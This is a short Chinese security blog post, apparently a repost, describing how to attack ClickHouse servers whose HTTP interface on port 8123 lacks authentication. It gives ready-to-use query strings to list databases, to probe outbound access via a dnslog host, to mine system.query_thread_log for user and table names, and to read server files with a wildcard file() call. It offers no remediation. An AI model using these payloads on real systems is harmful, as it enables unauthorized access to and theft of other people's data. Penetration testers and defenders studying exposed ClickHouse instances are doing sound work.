ClickHouse 8123端口

admin 2024年6月21日15:58:13ClickHouse 8123端口已关闭评论8 views字数 1055阅读3分31秒阅读模式


img

这里可以看到 ClickHouse 存在着的接口由于没有鉴权,则任意访问者都可以执行SQL语句获取数据

# 攻击方法

首先确定是否使用了 ClickHouse 数据库的接口

img

根据文档得知,正常返回为 Ok. , 且存在 X-ClickHouse-Summary 作为返回包的 Header

img

测试是否可以执行SQL命令, 部分会开启身份验证导致未授权执行失败

/?query=SHOW%20DATABASES

1

img

成功执行语句获取数据,执行其他命令探测出网

/?query=SELECT%20*%20FROM%20url('http://jahl09.dnslog.cn','txt','column1%20UInt32')%20LIMIT%202

1

img

img

其中也可以查看 system库中的执行记录表来获取最近执行的所有SQL语句来快速定位可利用的信息

(获取敏感用户信息,数据库名以及数据表名)

/?query=SELECT%20*%20FROM%20system.query_thread_log

1

img

由于默认配置中的可读路径默认 (配置文件位置:/etc/clickhouse-server/config.xml)

因此只能读取下面路径中的文件,当目标中曾在该路径导入文件且没有删除的情况下,可通过测试获取敏感文件信息,获取数据文件

img

其中读取时可以利用通配符跳过不知道文件名的情况获取文件信息

img

/?query=SELECT%20*%20FROM%20file('*'%2C%20'CSV'%2C%20'column1%20String%2C%20column2%20String%2C%20column3%20String')%20LIMIT%203%3B"

1

img

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月21日15:58:13
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   ClickHouse 8123端口https://cn-sec.com/archives/2871501.html